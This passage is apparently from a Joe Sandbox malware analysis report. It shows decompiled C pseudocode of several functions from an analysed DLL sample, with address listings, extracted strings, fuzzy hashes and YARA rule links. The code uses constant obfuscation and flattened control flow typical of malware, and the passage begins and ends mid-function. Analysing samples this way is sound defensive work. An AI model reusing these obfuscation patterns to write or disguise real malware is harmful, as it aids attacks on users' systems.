				_v76 = _v76 ^ 0x000074b4;
				_v92 = 0x17a820;
				_v92 = _v92 ^ 0x3a93bf92;
				_v92 = _v92 | 0x1a458659;
				_v92 = _v92 ^ 0x3acb9ffe;
				_v144 = 0x9f1ca1;
				_v144 = _v144 << 3;
				_v144 = _v144 | 0x88246970;
				_v144 = _v144 + 0x8e62;
				_v144 = _v144 ^ 0x8cf667c6;
				_v52 = 0x8da33b;
				_v52 = _v52 >> 8;
				_v52 = _v52 ^ 0x00059428;
				_v96 = 0x1abb08;
				_v96 = _v96 ^ 0x6c742edf;
				_v96 = _v96 + 0xffff01f6;
				_v96 = _v96 ^ 0x6c6614ef;
				_v112 = 0x9f0f81;
				_v112 = _v112 * 0x6a;
				_v112 = _v112 >> 3;
				_v112 = _v112 ^ 0x083a0fed;
				_v156 = 0x609a24;
				_v156 = _v156 + 0xffff683f;
				_v156 = _v156 << 5;
				_v156 = _v156 + 0xcd31;
				_v156 = _v156 ^ 0x0c079756;
				_v164 = 0xe5cc1d;
				_v164 = _v164 << 7;
				_v164 = _v164 | 0x9a492847;
				_v164 = _v164 * 0x78;
				_v164 = _v164 ^ 0xa012b17f;
				_v128 = 0x53ee3c;
				_t120 =  &_v128; // 0x53ee3c
				_t383 = 0x29;
				_v128 =  *_t120 / _t383;
				_v128 = _v128 ^ 0x929088a5;
				_v128 = _v128 + 0xa7c3;
				_v128 = _v128 ^ 0x929242c1;
				_v140 = 0x5f30f1;
				_v140 = _v140 | 0xd1491927;
				_t384 = 0x7c;
				_v140 = _v140 / _t384;
				_t385 = 0x58;
				_v140 = _v140 / _t385;
				_v140 = _v140 ^ 0x000295f0;
				_v88 = 0x55e174;
				_v88 = _v88 ^ 0x7dd6f036;
				_v88 = _v88 >> 0xd;
				_v88 = _v88 ^ 0x000a8d63;
				_v28 = 0xb452eb;
				_v28 = _v28 + 0xffff5322;
				_v28 = _v28 ^ 0x00ba2bf5;
				_v36 = 0x42507a;
				_v36 = _v36 | 0xf1dc1e20;
				_v36 = _v36 ^ 0xf1d9c77b;
				_v80 = 0xc31b4e;
				_v80 = _v80 ^ 0xd2ac5232;
				_t386 = 0x43;
				_v80 = _v80 / _t386;
				_v80 = _v80 ^ 0x03298e6e;
				_v124 = 0x46c8cc;
				_v124 = _v124 << 8;
				_v124 = _v124 >> 5;
				_v124 = _v124 << 7;
				_v124 = _v124 ^ 0x1b2fd4b6;
				_v132 = 0x745205;
				_v132 = _v132 ^ 0x1862e0ae;
				_v132 = _v132 << 5;
				_v132 = _v132 >> 6;
				_v132 = _v132 ^ 0x0007d289;
				_v20 = 0x713f0f;
				_v20 = _v20 ^ 0x61c76558;
				_v20 = _v20 ^ 0x61bb476a;
				_v48 = 0x3998c0;
				_v48 = _v48 | 0xd3555304;
				_v48 = _v48 ^ 0xd37b9815;
				_v160 = 0xe5ad6c;
				_v160 = _v160 * 0x3a;
				_v160 = _v160 | 0x660736ab;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0xefd0e6e0;
				_v60 = 0x9fc9f5;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x000a96ad;
				_v16 = 0xa888b5;
				_v16 = _v16 << 0xb;
				_v16 = _v16 ^ 0x4445c6cc;
				_v104 = 0xee35af;
				_v104 = _v104 ^ 0xea83652e;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x536d6a1f;
				_v12 = 0x6066b2;
				_v12 = _v12 + 0xb1d6;
				_v12 = _v12 ^ 0x00605003;
				_v40 = 0x2dba20;
				_v40 = _v40 * 0x73;
				_v40 = _v40 ^ 0x1485b41c;
				_v136 = 0xfcb12d;
				_v136 = _v136 << 1;
				_v136 = _v136 + 0xaead;
				_v136 = _v136 + 0xffffaecb;
				_v136 = _v136 ^ 0x01ffed69;
				_v24 = 0x751c6a;
				_t387 = 0x7d;
				_v24 = _v24 / _t387;
				_v24 = _v24 ^ 0x0002b143;
				_v68 = 0x69a6e2;
				_v68 = _v68 + 0xaa03;
				_v68 = _v68 ^ 0x73662bb1;
				_v68 = _v68 ^ 0x730f0150;
				_v100 = 0xcb496d;
				_v100 = _v100 >> 1;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x0008f604;
				_v56 = 0x2cd04e;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0x0162f7e8;
				_v32 = 0xb2ca4d;
				_v32 = _v32 + 0x32b9;
				_v32 = _v32 ^ 0x00b4bcfb;
				_v64 = 0x655992;
				_v64 = _v64 >> 5;
				_v64 = _v64 | 0x6342cf71;
				_v64 = _v64 ^ 0x634627b6;
				_v116 = 0x833545;
				_v116 = _v116 * 0x75;
				_v116 = _v116 + 0xeb9e;
				_v116 = _v116 * 0x6f;
				_v116 = _v116 ^ 0x00ae15cd;
				while(1) {
					L1:
					_t364 = 0x917a7c8;
					do {
						if(_t379 == 0x771143) {
							_t379 = 0x6e440a7;
							goto L9;
						} else {
							if(_t379 == 0x1a710aa) {
								E0086F7FE(_v64, _v8, _v116, _v72);
							} else {
								if(_t379 == 0x6e440a7) {
									_push(_v92);
									_push(_v76);
									_push(_v108);
									_t367 = E0087E1F8(0x8614c8, _v120, __eflags);
									_push(_v112);
									_push(_v96);
									_push(_v52);
									__eflags = E0086738A(_v156, _t367, _v164, _v44,  &_v8, E0087E1F8(0x861318, _v144, __eflags), _v128) - _v148;
									_t379 =  ==  ? 0x917a7c8 : 0x14ee4a5;
									E0087FECB(_t367, _v140, _v88, _v28, _v36);
									E0087FECB(_t368, _v80, _v124, _v132, _v20);
									_t425 = _v4;
									_t430 =  &(_t430[0x11]);
									_t364 = 0x917a7c8;
									goto L9;
								} else {
									_t436 = _t379 - _t364;
									if(_t379 != _t364) {
										goto L9;
									} else {
										_push(_v16);
										_push(_v60);
										_push(_v160);
										_t375 = E0087E1F8(0x861368, _v48, _t436);
										_t420 =  *0x886224; // 0x0
										E0086BC32( *((intOrPtr*)(_t425 + 4)), _t420 + 0x48, _v152, _v104, _v12, _t375,  *_t425, _v40, _v136, _v8, 0x861368, _v24);
										_t379 = 0x1a710aa;
										_t429 =  ==  ? 1 : _t429;
										E0087FECB(_t375, _v68, _v100, _v56, _v32);
										_t430 =  &(_t430[0x10]);
										goto L1;
									}
								}
							}
						}
						L12:
						return _t429;
						L9:
						__eflags = _t379 - 0x14ee4a5;
					} while (__eflags != 0);
					goto L12;
				}
			}

0x00878fae
0x00878fb4
0x00878fbe
0x00878fc6
0x00878fce
0x00878fd6
0x00878fe6
0x00878fe8
0x00878fec
0x00878fef
0x00878ff6
0x00878ffb
0x00879004
0x00879008
0x00879010
0x00879018
0x00879025
0x00879029
0x00879031
0x00879039
0x00879041
0x00879049
0x0087904e
0x00879056
0x0087905e
0x00879066
0x0087906b
0x00879073
0x0087907b
0x00879083
0x0087908b
0x00879093
0x0087909b
0x008790a3
0x008790ab
0x008790b3
0x008790bb
0x008790c3
0x008790cb
0x008790d0
0x008790d8
0x008790e0
0x008790e8
0x008790f0
0x008790f8
0x00879100
0x00879105
0x0087910d
0x00879115
0x0087911d
0x00879128
0x00879130
0x0087913b
0x00879143
0x0087914b
0x00879153
0x0087915b
0x00879168
0x0087916c
0x00879171
0x00879179
0x00879181
0x00879189
0x0087918e
0x00879196
0x0087919e
0x008791a6
0x008791ab
0x008791b8
0x008791bc
0x008791c4
0x008791ce
0x008791d4
0x008791d9
0x008791df
0x008791e7
0x008791ef
0x008791f7
0x008791ff
0x0087920b
0x00879210
0x0087921a
0x0087921f
0x00879225
0x0087922d
0x00879235
0x0087923d
0x00879242
0x0087924a
0x00879255
0x00879260
0x0087926b
0x00879276
0x00879281
0x0087928c
0x00879294
0x008792a0
0x008792a3
0x008792a7
0x008792af
0x008792b7
0x008792bc
0x008792c1
0x008792c6
0x008792ce
0x008792d6
0x008792de
0x008792e3
0x008792e8
0x008792f0
0x008792fb
0x00879306
0x00879311
0x0087931c
0x00879327
0x00879332
0x0087933f
0x00879343
0x0087934b
0x00879350
0x00879358
0x00879360
0x00879365
0x0087936d
0x00879378
0x00879380
0x0087938b
0x00879393
0x0087939b
0x008793a0
0x008793a8
0x008793b3
0x008793be
0x008793c9
0x008793dc
0x008793e5
0x008793f0
0x008793f8
0x008793fc
0x00879404
0x0087940c
0x00879414
0x00879428
0x0087942b
0x00879432
0x0087943d
0x00879445
0x0087944d
0x00879455
0x0087945d
0x00879465
0x00879469
0x0087946e
0x00879476
0x0087947e
0x00879483
0x0087948b
0x00879496
0x008794a1
0x008794ac
0x008794b4
0x008794b9
0x008794c1
0x008794c9
0x008794d6
0x008794da
0x008794e7
0x008794eb
0x008794f3
0x008794f3
0x008794f3
0x008794f8
0x008794fe
0x00879688
0x00000000
0x00879504
0x0087950a
0x008796ae
0x00879510
0x00879516
0x008795c7
0x008795d0
0x008795d4
0x008795dc
0x008795e1
0x008795ec
0x008795f0
0x00879630
0x00879647
0x00879655
0x00879672
0x00879677
0x0087967e
0x00879681
0x00000000
0x0087951c
0x0087951c
0x0087951e
0x00000000
0x00879524
0x00879524
0x00879530
0x00879534
0x0087953f
0x00879575
0x00879581
0x0087959b
0x008795a7
0x008795ba
0x008795bf
0x00000000
0x008795bf
0x0087951e
0x00879516
0x0087950a
0x008796b7
0x008796c1
0x0087968d
0x0087968d
0x0087968d
0x00000000
0x00879699

Strings

<S, xrefs: 008791CE
tU, xrefs: 0087922D
zPB, xrefs: 0087926B

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: <S$tU$zPB
API String ID: 0-3909742637
Opcode ID: c4a3e79153e1a54fbf33273d22798f43a9321e73b0bac509088163b181b7c380
Instruction ID: b5d5bca74089b3d4ef9dbe267a4411f39a23fa95b662bfe4058d123db591ccec
Opcode Fuzzy Hash: c4a3e79153e1a54fbf33273d22798f43a9321e73b0bac509088163b181b7c380
Instruction Fuzzy Hash: 47F1FE715083809FD768CF25C58AA4BBBF2FBC5748F50891DE6EA96260D7B18909CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00879DF5, Relevance: 4.0, Strings: 3, Instructions: 223
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00879DF5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				unsigned int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t196;
				void* _t219;
				char _t222;
				void* _t227;
				char* _t235;
				void* _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				signed int* _t272;

				_push(_a12);
				_t259 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t196);
				_v164 = 0xe41f8c;
				_t272 =  &(( &_v208)[5]);
				_v164 = _v164 << 0x10;
				_t227 = 0xb5c0777;
				_t260 = 0x69;
				_v164 = _v164 * 0x11;
				_v164 = _v164 ^ 0x18467706;
				_v180 = 0xeb334b;
				_v180 = _v180 ^ 0xb42ec71e;
				_v180 = _v180 << 0xf;
				_v180 = _v180 ^ 0xfa2f170d;
				_v204 = 0x9173d0;
				_v204 = _v204 / _t260;
				_v204 = _v204 + 0xc6b3;
				_t261 = 0x22;
				_v204 = _v204 / _t261;
				_v204 = _v204 ^ 0x000ee5cc;
				_v176 = 0x7c8d5;
				_v176 = _v176 | 0x723fe192;
				_v176 = _v176 + 0x4897;
				_v176 = _v176 ^ 0x724c9210;
				_v184 = 0xa283a5;
				_v184 = _v184 >> 0xd;
				_v184 = _v184 >> 9;
				_v184 = _v184 ^ 0x00039d39;
				_v172 = 0xfcf8f5;
				_t262 = 0x68;
				_v172 = _v172 / _t262;
				_t263 = 0x12;
				_v172 = _v172 / _t263;
				_v172 = _v172 ^ 0x0008ec4c;
				_v196 = 0x6ce5d4;
				_v196 = _v196 + 0x3b25;
				_v196 = _v196 ^ 0x77f3da3b;
				_v196 = _v196 + 0xa9d5;
				_v196 = _v196 ^ 0x779af0ad;
				_v156 = 0x25f26f;
				_t264 = 0x4f;
				_v156 = _v156 / _t264;
				_v156 = _v156 ^ 0x000ca3cb;
				_v188 = 0x55ff28;
				_t265 = 7;
				_v188 = _v188 / _t265;
				_t266 = 0x50;
				_v188 = _v188 / _t266;
				_v188 = _v188 ^ 0x000cd773;
				_v148 = 0x9faf35;
				_v148 = _v148 >> 0xb;
				_v148 = _v148 ^ 0x00041a0d;
				_v144 = 0xb9aa79;
				_v144 = _v144 + 0xffff300b;
				_v144 = _v144 ^ 0x00b65e72;
				_v152 = 0xe2e022;
				_v152 = _v152 << 0xa;
				_v152 = _v152 ^ 0x8b87efd2;
				_v140 = 0x6f845f;
				_v140 = _v140 ^ 0xc6ebfb93;
				_v140 = _v140 ^ 0xc684fc76;
				_v208 = 0x15bd2c;
				_v208 = _v208 + 0xca24;
				_v208 = _v208 + 0xaf45;
				_v208 = _v208 >> 5;
				_v208 = _v208 ^ 0x000727e8;
				_v136 = 0x982476;
				_v136 = _v136 | 0xd92aa943;
				_v136 = _v136 ^ 0xd9b01548;
				_v160 = 0x20104f;
				_v160 = _v160 ^ 0xef20d220;
				_t267 = 0x2e;
				_v160 = _v160 * 0x21;
				_v160 = _v160 ^ 0xcf1410de;
				_v168 = 0x2e9b6b;
				_v168 = _v168 + 0xffff5c1c;
				_v168 = _v168 * 0x26;
				_v168 = _v168 ^ 0x06dc91dd;
				_v192 = 0xd01025;
				_v192 = _v192 | 0x8f03462b;
				_v192 = _v192 + 0xffffdaa2;
				_v192 = _v192 << 2;
				_v192 = _v192 ^ 0x3f4450ba;
				_v200 = 0xfd9656;
				_v200 = _v200 | 0x00ba0155;
				_v200 = _v200 / _t267;
				_t268 = 0x6a;
				_v200 = _v200 / _t268;
				_v200 = _v200 ^ 0x00073cbf;
				while(_t227 != 0x9fc41a2) {
					if(_t227 == 0xa1171ea) {
						_v132 = 0x80;
						_t222 = E008796C2(_v164, _v180, _v204, _v176,  &_v128,  &_v132);
						_t272 =  &(_t272[4]);
						_t227 = 0xabd7dae;
						continue;
					} else {
						if(_t227 == 0xabd7dae) {
							__eflags = _v128;
							_t235 =  &_v128;
							while(__eflags != 0) {
								_t222 =  *_t235;
								__eflags = _t222 - 0x30;
								if(_t222 < 0x30) {
									L9:
									__eflags = _t222 - 0x61;
									if(_t222 < 0x61) {
										L11:
										__eflags = _t222 - 0x41;
										if(_t222 < 0x41) {
											L13:
											 *_t235 = 0x58;
										} else {
											__eflags = _t222 - 0x5a;
											if(_t222 > 0x5a) {
												goto L13;
											}
										}
									} else {
										__eflags = _t222 - 0x7a;
										if(_t222 > 0x7a) {
											goto L11;
										}
									}
								} else {
									__eflags = _t222 - 0x39;
									if(_t222 > 0x39) {
										goto L9;
									}
								}
								_t235 = _t235 + 1;
								__eflags =  *_t235;
							}
							_t227 = 0x9fc41a2;
							continue;
						} else {
							if(_t227 == 0xb5c0777) {
								_t227 = 0xa1171ea;
								continue;
							}
						}
					}
					L18:
					__eflags = _t227 - 0x108096a;
					if(__eflags != 0) {
						continue;
					}
					return _t222;
				}
				_push(_v156);
				_push(_v196);
				_push(0x86119c);
				_t219 = E00874244(_v184, _v172, __eflags);
				E00880A1A(E00875515(__eflags), __eflags, _t219, _v152,  &_v128, _v188, _t259, _v140, _v208, _v136);
				_t222 = E0087FECB(_t219, _v160, _v168, _v192, _v200);
				_t272 =  &(_t272[0xe]);
				_t227 = 0x108096a;
				goto L18;
			}

0x00879dff
0x00879e06
0x00879e08
0x00879e0f
0x00879e16
0x00879e17
0x00879e18
0x00879e1d
0x00879e25
0x00879e28
0x00879e34
0x00879e3b
0x00879e3e
0x00879e42
0x00879e4a
0x00879e52
0x00879e5a
0x00879e5f
0x00879e67
0x00879e77
0x00879e7b
0x00879e87
0x00879e8c
0x00879e92
0x00879e9a
0x00879ea2
0x00879eaa
0x00879eb2
0x00879eba
0x00879ec2
0x00879ec7
0x00879ecc
0x00879ed4
0x00879ee0
0x00879ee5
0x00879eef
0x00879ef4
0x00879efa
0x00879f02
0x00879f0a
0x00879f12
0x00879f1a
0x00879f22
0x00879f2a
0x00879f36
0x00879f3b
0x00879f41
0x00879f49
0x00879f55
0x00879f5a
0x00879f64
0x00879f69
0x00879f6f
0x00879f7c
0x00879f89
0x00879f8e
0x00879f96
0x00879f9e
0x00879fa6
0x00879fae
0x00879fb6
0x00879fbb
0x00879fc3
0x00879fcb
0x00879fd3
0x00879fdb
0x00879fe3
0x00879feb
0x00879ff3
0x00879ff8
0x0087a000
0x0087a008
0x0087a010
0x0087a018
0x0087a020
0x0087a02d
0x0087a030
0x0087a034
0x0087a03c
0x0087a044
0x0087a051
0x0087a055
0x0087a05d
0x0087a065
0x0087a06d
0x0087a075
0x0087a07a
0x0087a082
0x0087a08a
0x0087a09a
0x0087a0a2
0x0087a0a5
0x0087a0a9
0x0087a0b1
0x0087a0bb
0x0087a10b
0x0087a129
0x0087a12e
0x0087a131
0x00000000
0x0087a0bd
0x0087a0c3
0x0087a0d5
0x0087a0da
0x0087a0de
0x0087a0e0
0x0087a0e2
0x0087a0e4
0x0087a0ea
0x0087a0ea
0x0087a0ec
0x0087a0f2
0x0087a0f2
0x0087a0f4
0x0087a0fa
0x0087a0fa
0x0087a0f6
0x0087a0f6
0x0087a0f8
0x00000000
0x00000000
0x0087a0f8
0x0087a0ee
0x0087a0ee
0x0087a0f0
0x00000000
0x00000000
0x0087a0f0
0x0087a0e6
0x0087a0e6
0x0087a0e8
0x00000000
0x00000000
0x0087a0e8
0x0087a0fd
0x0087a0fe
0x0087a0fe
0x0087a103
0x00000000
0x0087a0c5
0x0087a0cb
0x0087a0d1
0x00000000
0x0087a0d1
0x0087a0cb
0x0087a0c3
0x0087a1a9
0x0087a1a9
0x0087a1af
0x00000000
0x00000000
0x0087a1bf
0x0087a1bf
0x0087a13b
0x0087a13f
0x0087a14b
0x0087a150
0x0087a185
0x0087a19c
0x0087a1a1
0x0087a1a4
0x00000000

Strings

", xrefs: 00879FAE
K3, xrefs: 00879E4A
%;, xrefs: 00879F0A

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: "$%;$K3
API String ID: 0-3594330084
Opcode ID: a88205c1c2326de2fc6b84b053231ab1fd9f54b2bacef012b27fafb092af0d03
Instruction ID: 76ea1f4019aece86c67c3a2f423ebfd09c199e28edc6a1f93d906fd1b02826d7
Opcode Fuzzy Hash: a88205c1c2326de2fc6b84b053231ab1fd9f54b2bacef012b27fafb092af0d03
Instruction Fuzzy Hash: 7FA160721083809FD358DF6AC98995FBBE2FBC4758F40891DF18A9A224D3B5C9498F43

Uniqueness

Uniqueness Score: -1.00%

Function 0086A445, Relevance: 4.0, Strings: 3, Instructions: 213
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0086A445() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t198;
				signed int _t201;
				signed int _t203;
				void* _t206;
				void* _t220;
				void* _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				intOrPtr _t229;
				intOrPtr* _t230;
				signed int _t231;
				signed int* _t232;

				_t232 =  &_v84;
				_v16 = 0x845726;
				_v16 = _v16 << 7;
				_t206 = 0xba97f4f;
				_v16 = _v16 ^ 0x422a9300;
				_v76 = 0xf633ca;
				_v76 = _v76 + 0xffff7f31;
				_v76 = _v76 << 6;
				_v76 = _v76 | 0x2929f239;
				_v76 = _v76 ^ 0x3d62fec6;
				_v20 = 0xcffe1c;
				_v20 = _v20 ^ 0x03d09261;
				_v20 = _v20 ^ 0x03162068;
				_v24 = 0xa4ea56;
				_v24 = _v24 + 0xffff4c41;
				_v24 = _v24 ^ 0x00afa4b9;
				_v40 = 0x50bd11;
				_v40 = _v40 + 0xffffa7ab;
				_v40 = _v40 * 0x3f;
				_t225 = 0;
				_v40 = _v40 ^ 0x13cebba3;
				_v60 = 0x50c08b;
				_v60 = _v60 ^ 0xc2cf2608;
				_v60 = _v60 << 4;
				_t226 = 0x56;
				_v60 = _v60 / _t226;
				_v60 = _v60 ^ 0x0073141c;
				_v64 = 0xa37df4;
				_v64 = _v64 + 0xffffdd88;
				_v64 = _v64 + 0xe629;
				_v64 = _v64 << 3;
				_v64 = _v64 ^ 0x0527d1d9;
				_v68 = 0x27b9fb;
				_t227 = 0x58;
				_v68 = _v68 / _t227;
				_v68 = _v68 * 0x63;
				_v68 = _v68 * 0x3d;
				_v68 = _v68 ^ 0x0aa4ff90;
				_v72 = 0x604a05;
				_v72 = _v72 | 0x3301bbe0;
				_v72 = _v72 + 0xf4ce;
				_v72 = _v72 + 0xffff6149;
				_v72 = _v72 ^ 0x336b10da;
				_v52 = 0x457d04;
				_v52 = _v52 * 0x45;
				_v52 = _v52 | 0xd82309ca;
				_v52 = _v52 + 0xff64;
				_v52 = _v52 ^ 0xdab2f2cc;
				_v8 = 0x71eccb;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x000a626b;
				_v12 = 0x94a0c6;
				_v12 = _v12 + 0xffffb2fd;
				_v12 = _v12 ^ 0x009145d9;
				_v56 = 0xdce517;
				_v56 = _v56 >> 1;
				_v56 = _v56 | 0xebc149ed;
				_v56 = _v56 + 0xffff7372;
				_v56 = _v56 ^ 0xebe5f8bb;
				_v44 = 0x6f3a42;
				_v44 = _v44 ^ 0x930a70ca;
				_v44 = _v44 ^ 0x072310e6;
				_v44 = _v44 ^ 0x944572d0;
				_v28 = 0xde598c;
				_v28 = _v28 + 0xffffb8ee;
				_v28 = _v28 ^ 0x00dc27c3;
				_v80 = 0x428d3e;
				_v80 = _v80 * 0x44;
				_v80 = _v80 + 0x7fb1;
				_v80 = _v80 ^ 0x009e7bae;
				_v80 = _v80 ^ 0x11330260;
				_v84 = 0x321edf;
				_v84 = _v84 | 0x009a6787;
				_v84 = _v84 ^ 0xc86f44a5;
				_v84 = _v84 ^ 0xbb12ab62;
				_v84 = _v84 ^ 0x73cf70d9;
				_v48 = 0x740eb7;
				_v48 = _v48 * 0x2b;
				_v48 = _v48 * 0x4f;
				_v48 = _v48 + 0xb6e6;
				_v48 = _v48 ^ 0x040daff3;
				_v32 = 0x3035f0;
				_v32 = _v32 ^ 0xe5f6800a;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0xcb8c371c;
				_v36 = 0xd97c9c;
				_v36 = _v36 >> 3;
				_v36 = _v36 * 0x24;
				_v36 = _v36 ^ 0x03d4918e;
				_v4 = 0x2cfea0;
				_v4 = _v4 ^ 0xf57e16a0;
				_v4 = _v4 ^ 0xf550cd22;
				_t205 = _v4;
				_t231 = _v4;
				_t228 = _v4;
				while(1) {
					L1:
					_push(0x5c);
					while(1) {
						L2:
						_t198 = 0xd71e2f;
						do {
							L3:
							while(_t206 != _t198) {
								if(_t206 == 0x1e5f8bf) {
									_t201 = E0086EE62(_v60, _t205, _v64, _v68, _v72, _v16, _t228);
									_t232 =  &(_t232[5]);
									_t231 = _t201;
									_t198 = 0xd71e2f;
									_t206 =  !=  ? 0xd71e2f : 0x6f129a6;
									_t220 = 0x5c;
									continue;
								} else {
									if(_t206 == 0x6f129a6) {
										E00863046(_v48, _v32, _v36, _t205, _v4);
									} else {
										if(_t206 == 0x960e40f) {
											_t203 = E0087E8B6(_t206, _v20, _v24, _t206, _v76, _v40);
											_t205 = _t203;
											_t232 =  &(_t232[4]);
											if(_t203 != 0) {
												_t206 = 0x1e5f8bf;
												goto L1;
											}
										} else {
											if(_t206 == 0xba97f4f) {
												_t206 = 0xbab8332;
												continue;
											} else {
												if(_t206 == 0xbab8332) {
													_t229 =  *0x886214; // 0x0
													_t230 = _t229 + 0x23c;
													while( *_t230 != _t220) {
														_t230 = _t230 + 2;
													}
													_t228 = _t230 + 2;
													_t206 = 0x960e40f;
													goto L2;
												} else {
													if(_t206 != 0xe557a67) {
														goto L20;
													} else {
														E00863046(_v44, _v28, _v80, _t231, _v84);
														_t232 =  &(_t232[3]);
														_t206 = 0x6f129a6;
														while(1) {
															L1:
															_push(0x5c);
															L2:
															_t198 = 0xd71e2f;
															goto L3;
														}
													}
												}
											}
										}
									}
								}
								L23:
								return _t225;
							}
							E00861E9B(_v52, _t231, _v8, _v12, _v56);
							_t232 =  &(_t232[3]);
							_t198 = 0xd71e2f;
							_t225 =  !=  ? 1 : _t225;
							_t206 = 0xe557a67;
							_t220 = 0x5c;
							L20:
						} while (_t206 != 0x6b89e3f);
						goto L23;
					}
				}
			}

0x0086a445
0x0086a448
0x0086a452
0x0086a457
0x0086a45c
0x0086a464
0x0086a46c
0x0086a474
0x0086a479
0x0086a481
0x0086a489
0x0086a491
0x0086a499
0x0086a4a1
0x0086a4a9
0x0086a4b1
0x0086a4b9
0x0086a4c1
0x0086a4d2
0x0086a4d6
0x0086a4d8
0x0086a4e0
0x0086a4e8
0x0086a4f0
0x0086a4fb
0x0086a500
0x0086a506
0x0086a50e
0x0086a516
0x0086a51e
0x0086a526
0x0086a52b
0x0086a533
0x0086a53f
0x0086a542
0x0086a54b
0x0086a554
0x0086a558
0x0086a560
0x0086a568
0x0086a570
0x0086a578
0x0086a580
0x0086a588
0x0086a595
0x0086a599
0x0086a5a1
0x0086a5a9
0x0086a5b1
0x0086a5b9
0x0086a5be
0x0086a5c6
0x0086a5ce
0x0086a5d6
0x0086a5de
0x0086a5e6
0x0086a5ea
0x0086a5f2
0x0086a5fa
0x0086a602
0x0086a60a
0x0086a612
0x0086a61a
0x0086a622
0x0086a62a
0x0086a632
0x0086a63a
0x0086a647
0x0086a64b
0x0086a653
0x0086a65b
0x0086a663
0x0086a66b
0x0086a673
0x0086a67b
0x0086a683
0x0086a68b
0x0086a698
0x0086a6a1
0x0086a6a5
0x0086a6ad
0x0086a6b5
0x0086a6bd
0x0086a6c5
0x0086a6c9
0x0086a6d1
0x0086a6d9
0x0086a6e3
0x0086a6e7
0x0086a6ef
0x0086a6f7
0x0086a6ff
0x0086a707
0x0086a70b
0x0086a70f
0x0086a713
0x0086a713
0x0086a713
0x0086a716
0x0086a716
0x0086a716
0x0086a71b
0x00000000
0x0086a71b
0x0086a729
0x0086a7f0
0x0086a7f5
0x0086a7f8
0x0086a801
0x0086a806
0x0086a80b
0x00000000
0x0086a72f
0x0086a735
0x0086a85f
0x0086a73b
0x0086a741
0x0086a7bd
0x0086a7c2
0x0086a7c4
0x0086a7c9
0x0086a7cf
0x00000000
0x0086a7cf
0x0086a743
0x0086a749
0x0086a7a2
0x00000000
0x0086a74b
0x0086a751
0x0086a77f
0x0086a785
0x0086a790
0x0086a78d
0x0086a78d
0x0086a795
0x0086a798
0x00000000
0x0086a753
0x0086a759
0x00000000
0x0086a75f
0x0086a770
0x0086a775
0x0086a778
0x0086a713
0x0086a713
0x0086a713
0x0086a716
0x0086a716
0x00000000
0x0086a716
0x0086a713
0x0086a759
0x0086a751
0x0086a749
0x0086a741
0x0086a735
0x0086a867
0x0086a870
0x0086a870
0x0086a823
0x0086a828
0x0086a830
0x0086a835
0x0086a838
0x0086a83f
0x0086a840
0x0086a840
0x00000000
0x0086a84c
0x0086a716

Strings

kb, xrefs: 0086A5BE
), xrefs: 0086A51E
B:o, xrefs: 0086A602

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: )$B:o$kb
API String ID: 0-1085388577
Opcode ID: 24e0933aeba51255608bb033d32d0ce43636c9d19e1da8ca5eecb1ac430e3523
Instruction ID: 04ed8bdd592cc190b660c098c6512272b00f528266d2e135dc9128e9d7936d02
Opcode Fuzzy Hash: 24e0933aeba51255608bb033d32d0ce43636c9d19e1da8ca5eecb1ac430e3523
Instruction Fuzzy Hash: 4EA131714083419FC398CF65C98A81BBBF1FBC4758F109A2DF59AA6260D7B18A09CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0087BEFD, Relevance: 4.0, Strings: 3, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0087BEFD(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
